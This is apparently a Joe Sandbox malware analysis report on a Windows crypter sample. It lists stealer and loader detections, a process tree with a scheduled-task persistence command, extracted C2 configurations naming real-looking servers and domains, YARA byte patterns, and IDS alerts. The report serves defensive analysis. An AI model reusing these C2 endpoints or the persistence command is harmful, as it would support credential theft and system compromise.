Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
Analysis ID:1514924
MD5:96cb7df578398d5d46dd4daeffbdc41f
SHA1:7b7ecf7d006c2e2cd2b237dde3402f6b78e6c54b
SHA256:e301b79d4279d52c49c886fcd0ab8acc3941c5cf28c7dd0eb57e8af81fe476fb
Tags:exe
Infos:

Detection

Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Clipboard Hijacker
Yara detected Cryptbot
Yara detected Go Injector
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PrivateLoader
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected Stealc
Yara detected Vidar
Yara detected Vidar stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Drops large PE files
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Launches processes in debugging mode, may be used to hinder debugging
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe (PID: 1876 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe" MD5: 96CB7DF578398D5D46DD4DAEFFBDC41F)
    • RegAsm.exe (PID: 2016 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 6388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • Yt_9y5LuIpBZXKd9EiYluKkG.exe (PID: 1280 cmdline: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exe MD5: 92C66C140509B75BAE23F055D427AFB4)
        • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 5752 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • kFXFCWzZNovbPAcE4V3M4DAO.exe (PID: 5828 cmdline: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exe MD5: 8FB3610C4BA81A5A93666562E712740A)
      • 5Hyf8PuolQS_j4ZkhvHWpkWr.exe (PID: 4924 cmdline: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exe MD5: 2F59FBD6623872FBDC2F63D18023BFDA)
        • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • aFBKY19rLrQU72E14du4WCPo.exe (PID: 6948 cmdline: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exe MD5: 1FEDF314D7C5ED06FF6833C9C8FE5441)
        • WerFault.exe (PID: 2548 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 876 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • g2v2mVtOHdxh9ZgrtYde5yf0.exe (PID: 3956 cmdline: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exe MD5: D687AF3B103399AA245807BB719878B7)
        • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 1812 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • conhost.exe (PID: 4700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • kJHbagG0C4H5BEyYJQeInLfF.exe (PID: 5888 cmdline: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exe MD5: 098E15E88E5332253356C78BADF8D479)
      • wg6F73wLMGz6xXFA14w_olCU.exe (PID: 2796 cmdline: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exe MD5: E8E6CD9EC48FAFCCC174F7BF07D045E2)
        • conhost.exe (PID: 1876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 6336 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 944 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • 1IvCzYfqoD3SHvKt45m1rbHu.exe (PID: 2036 cmdline: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exe MD5: A463E516041F4BC84F03BC8FE2B643DD)
        • conhost.exe (PID: 2240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 1708 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • WerFault.exe (PID: 6568 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 548 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • XO9lsdL5g6aUibu31TDcoBrI.exe (PID: 2228 cmdline: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe MD5: ABDBCC23BD8F767E671BAC6D2FF60335)
        • XO9lsdL5g6aUibu31TDcoBrI.exe (PID: 6828 cmdline: "C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe" MD5: ABDBCC23BD8F767E671BAC6D2FF60335)
        • XO9lsdL5g6aUibu31TDcoBrI.exe (PID: 5772 cmdline: "C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe" MD5: ABDBCC23BD8F767E671BAC6D2FF60335)
        • XO9lsdL5g6aUibu31TDcoBrI.exe (PID: 2624 cmdline: "C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe" MD5: ABDBCC23BD8F767E671BAC6D2FF60335)
          • schtasks.exe (PID: 6388 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • VkcBn13x2kmdo9AMRXP8qT_4.exe (PID: 6104 cmdline: C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exe MD5: 1905889C50091A12A2B3A94E525A3566)
        • VkcBn13x2kmdo9AMRXP8qT_4.tmp (PID: 5984 cmdline: "C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmp" /SL5="$30436,2863668,56832,C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exe" MD5: 33358B48CFE67C292BF76ABDDDB63947)
      • hd4YBtMwCrxG4M3aLLza89vv.exe (PID: 6500 cmdline: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exe MD5: EA754070163F8ECA914B259096D834F0)
        • conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 6524 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • iXbjjIcri3rG3XH6GK7dHSLO.exe (PID: 916 cmdline: C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exe MD5: CB3952F1852179348F8D2DB91760D03B)
      • _U2YDEzm5f5t9soM_Qc1Hc4U.exe (PID: 6060 cmdline: C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exe MD5: D60D266E8FBDBD7794653ECF2ABA26ED)
      • conhost.exe (PID: 3884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 316 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 6876 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6948 -ip 6948 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6112 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2796 -ip 2796 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2840 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1708 -ip 1708 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7224 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • jewkkwnf.exe (PID: 7408 cmdline: C:\ProgramData\jewkkwnf\jewkkwnf.exe MD5: ABDBCC23BD8F767E671BAC6D2FF60335)
  • svchost.exe (PID: 7520 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
NameDescriptionAttributionBlogpost URLsLink
PrivateLoaderAccording to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

Malware Configuration

Threatname: StealC

{"C2 url": "http://46.8.231.109/c4754d4f680ead72.php", "Botnet": "default"}

Threatname: LummaC

{"C2 url": ["opponnentduei.shop", "carrtychaintnyw.shop", "puredoffustow.shop", "achievenmtynwjq.shop", "chickerkuso.shop", "metallygaricwo.shop", "quotamkdsdqo.shop", "milldymarskwom.shop", "sentistivowmi.shop"], "Build id": "a8kafm--@cloudcosmic"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "d80be45a1eb6454ca916f92c36ebf67d"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Threatname: Amadey

{"C2 url": "45.202.35.101/pLQvfD4d/index.php", "Version": "4.42", "Install Folder": "9d94d7e7d6", "Install File": "Hkbsse.exe"}

Threatname: Cryptbot

{"C2 list": ["/v1/upload.phptventyvf20pt.top", "tventyvf20pt.top", "@tventyvf20pt.top", "analforeverlovyu.top", "entyvf20pt.top"]}

Threatname: RedLine

{"C2 url": "193.233.255.84:4284", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    sslproxydump.pcapJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
      sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          0000002B.00000002.2943867641.0000000002A61000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            0000002B.00000002.2943867641.0000000002A61000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
            • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
            00000009.00000002.2601636491.0000000002600000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              00000009.00000002.2601636491.0000000002600000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
              • 0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
              0000000D.00000002.2359247420.0000000003345000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 25 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                    • 0x431e9:$s1: file:///
                    • 0x43145:$s2: {11111-22222-10009-11112}
                    • 0x43179:$s3: {11111-22222-50001-00000}
                    • 0x40341:$s4: get_Module
                    • 0x3ab03:$s5: Reverse
                    • 0x3b853:$s6: BlockCopy
                    • 0x3aacc:$s7: ReadByte
                    • 0x431fb:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                    12.2.kJHbagG0C4H5BEyYJQeInLfF.exe.5ca3f2.1.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        Click to see the 13 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exe, ProcessId: 5888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dell
                        Sigma detected: Startup Folder File Write
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe, ProcessId: 2624, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 316, ProcessName: svchost.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:40.989196+020020362892Crypto Currency Mining Activity Detected192.168.2.9542351.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:43.702789+020020287653Unknown Traffic192.168.2.949761116.203.165.127443TCP
                        2024-09-21T13:34:45.330220+020020287653Unknown Traffic192.168.2.949762116.203.165.127443TCP
                        2024-09-21T13:34:46.946829+020020287653Unknown Traffic192.168.2.949763116.203.165.127443TCP
                        2024-09-21T13:34:48.897654+020020287653Unknown Traffic192.168.2.949765116.203.165.127443TCP
                        2024-09-21T13:34:51.164557+020020287653Unknown Traffic192.168.2.949766116.203.165.127443TCP
                        2024-09-21T13:34:55.720448+020020287653Unknown Traffic192.168.2.949768116.203.165.127443TCP
                        2024-09-21T13:34:56.709803+020020287653Unknown Traffic192.168.2.949769116.203.165.127443TCP
                        2024-09-21T13:35:00.859949+020020287653Unknown Traffic192.168.2.949772116.203.165.127443TCP
                        2024-09-21T13:35:01.796654+020020287653Unknown Traffic192.168.2.949773116.203.165.127443TCP
                        2024-09-21T13:35:04.581380+020020287653Unknown Traffic192.168.2.949774116.203.165.127443TCP
                        2024-09-21T13:35:06.049583+020020287653Unknown Traffic192.168.2.949775116.203.165.127443TCP
                        2024-09-21T13:35:08.195936+020020287653Unknown Traffic192.168.2.949777116.203.165.127443TCP
                        2024-09-21T13:35:10.597024+020020287653Unknown Traffic192.168.2.949778116.203.165.127443TCP
                        2024-09-21T13:35:12.256533+020020287653Unknown Traffic192.168.2.949779116.203.165.127443TCP
                        2024-09-21T13:35:13.919022+020020287653Unknown Traffic192.168.2.949780116.203.165.127443TCP
                        2024-09-21T13:35:16.606956+020020287653Unknown Traffic192.168.2.949781116.203.165.127443TCP
                        2024-09-21T13:35:20.642900+020020287653Unknown Traffic192.168.2.949782116.203.165.127443TCP
                        2024-09-21T13:35:23.749169+020020287653Unknown Traffic192.168.2.949784116.203.165.127443TCP
                        2024-09-21T13:35:25.594749+020020287653Unknown Traffic192.168.2.949785116.203.165.127443TCP
                        2024-09-21T13:35:27.691624+020020287653Unknown Traffic192.168.2.949786116.203.165.127443TCP
                        2024-09-21T13:35:30.369431+020020287653Unknown Traffic192.168.2.949788116.203.165.127443TCP
                        2024-09-21T13:35:33.001805+020020287653Unknown Traffic192.168.2.949789116.203.165.127443TCP
                        2024-09-21T13:35:37.141546+020020287653Unknown Traffic192.168.2.949791116.203.165.127443TCP
                        2024-09-21T13:35:38.964489+020020287653Unknown Traffic192.168.2.949792116.203.165.127443TCP
                        2024-09-21T13:35:46.021038+020020287653Unknown Traffic192.168.2.949798116.203.165.127443TCP
                        2024-09-21T13:35:47.527790+020020287653Unknown Traffic192.168.2.949799116.203.165.127443TCP
                        2024-09-21T13:35:48.974888+020020287653Unknown Traffic192.168.2.949800116.203.165.127443TCP
                        2024-09-21T13:35:50.489687+020020287653Unknown Traffic192.168.2.949802116.203.165.127443TCP
                        2024-09-21T13:35:52.154914+020020287653Unknown Traffic192.168.2.949804116.203.165.127443TCP
                        2024-09-21T13:35:54.301685+020020287653Unknown Traffic192.168.2.949805116.203.165.127443TCP
                        2024-09-21T13:35:55.279534+020020287653Unknown Traffic192.168.2.949806116.203.165.127443TCP
                        2024-09-21T13:35:58.314238+020020287653Unknown Traffic192.168.2.949807116.203.165.127443TCP
                        2024-09-21T13:35:59.020772+020020287653Unknown Traffic192.168.2.949808116.203.165.127443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:48.299832+020020546531A Network Trojan was detected192.168.2.949764188.114.97.3443TCP
                        2024-09-21T13:35:23.079490+020020546531A Network Trojan was detected192.168.2.949783104.21.88.61443TCP
                        2024-09-21T13:35:29.357540+020020546531A Network Trojan was detected192.168.2.949787104.21.88.61443TCP
                        2024-09-21T13:35:40.519909+020020546531A Network Trojan was detected192.168.2.949793172.67.204.62443TCP
                        2024-09-21T13:35:45.228535+020020546531A Network Trojan was detected192.168.2.949797172.67.204.62443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:35:23.079490+020020498361A Network Trojan was detected192.168.2.949783104.21.88.61443TCP
                        2024-09-21T13:35:40.519909+020020498361A Network Trojan was detected192.168.2.949793172.67.204.62443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:48.299832+020020498121A Network Trojan was detected192.168.2.949764188.114.97.3443TCP
                        2024-09-21T13:35:29.357540+020020498121A Network Trojan was detected192.168.2.949787104.21.88.61443TCP
                        2024-09-21T13:35:45.228535+020020498121A Network Trojan was detected192.168.2.949797172.67.204.62443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:41.658171+020020560051Domain Observed Used for C2 Detected192.168.2.949760188.114.97.3443TCP
                        2024-09-21T13:34:47.802912+020020560051Domain Observed Used for C2 Detected192.168.2.949764188.114.97.3443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:35:20.931758+020020560091Domain Observed Used for C2 Detected192.168.2.949783104.21.88.61443TCP
                        2024-09-21T13:35:28.785398+020020560091Domain Observed Used for C2 Detected192.168.2.949787104.21.88.61443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:35:40.351202+020020560231Domain Observed Used for C2 Detected192.168.2.949793172.67.204.62443TCP
                        2024-09-21T13:35:44.757366+020020560231Domain Observed Used for C2 Detected192.168.2.949797172.67.204.62443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:33:40.760164+020020185811A Network Trojan was detected192.168.2.949710103.130.147.21180TCP
                        2024-09-21T13:33:41.108483+020020185811A Network Trojan was detected192.168.2.949710103.130.147.21180TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:35:40.759550+020020544951A Network Trojan was detected192.168.2.94979445.132.206.25180TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:13.833469+020020543501A Network Trojan was detected192.168.2.9497425.53.124.19580TCP
                        2024-09-21T13:34:28.167720+020020543501A Network Trojan was detected192.168.2.9497495.53.124.19580TCP
                        2024-09-21T13:34:37.403302+020020543501A Network Trojan was detected192.168.2.9497565.53.124.19580TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:41.171990+020020560041Domain Observed Used for C2 Detected192.168.2.9555831.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:35:20.281769+020020560081Domain Observed Used for C2 Detected192.168.2.9642681.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:35:39.856358+020020560221Domain Observed Used for C2 Detected192.168.2.9648731.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:35:20.236859+020020558341Domain Observed Used for C2 Detected192.168.2.9582901.1.1.153UDP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:14.798575+020020442451Malware Command and Control Activity Detected46.8.231.10980192.168.2.949741TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:14.554960+020020442441Malware Command and Control Activity Detected192.168.2.94974146.8.231.10980TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:14.978359+020020442461Malware Command and Control Activity Detected192.168.2.94974146.8.231.10980TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:15.867896+020020442481Malware Command and Control Activity Detected192.168.2.94974146.8.231.10980TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:15.167363+020020442471Malware Command and Control Activity Detected46.8.231.10980192.168.2.949741TCP
                        2024-09-21T13:34:50.072379+020020442471Malware Command and Control Activity Detected116.203.165.127443192.168.2.949765TCP
                        2024-09-21T13:35:51.405870+020020442471Malware Command and Control Activity Detected116.203.165.127443192.168.2.949802TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:51.859301+020020518311Malware Command and Control Activity Detected116.203.165.127443192.168.2.949766TCP
                        2024-09-21T13:35:52.869312+020020518311Malware Command and Control Activity Detected116.203.165.127443192.168.2.949804TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:47.643249+020020490871A Network Trojan was detected192.168.2.949763116.203.165.127443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:14.150268+020020442431Malware Command and Control Activity Detected192.168.2.94974146.8.231.10980TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:58.382517+020028561471A Network Trojan was detected192.168.2.94977045.202.35.10180TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-21T13:34:16.871917+020028033043Unknown Traffic192.168.2.94974146.8.231.10980TCP
                        2024-09-21T13:34:22.869115+020028033043Unknown Traffic192.168.2.94974146.8.231.10980TCP
                        2024-09-21T13:34:23.939753+020028033043Unknown Traffic192.168.2.94974146.8.231.10980TCP
                        2024-09-21T13:34:25.046045+020028033043Unknown Traffic192.168.2.94974146.8.231.10980TCP
                        2024-09-21T13:34:25.768287+020028033043Unknown Traffic192.168.2.94974146.8.231.10980TCP
                        2024-09-21T13:34:27.746321+020028033043Unknown Traffic192.168.2.94974146.8.231.10980TCP
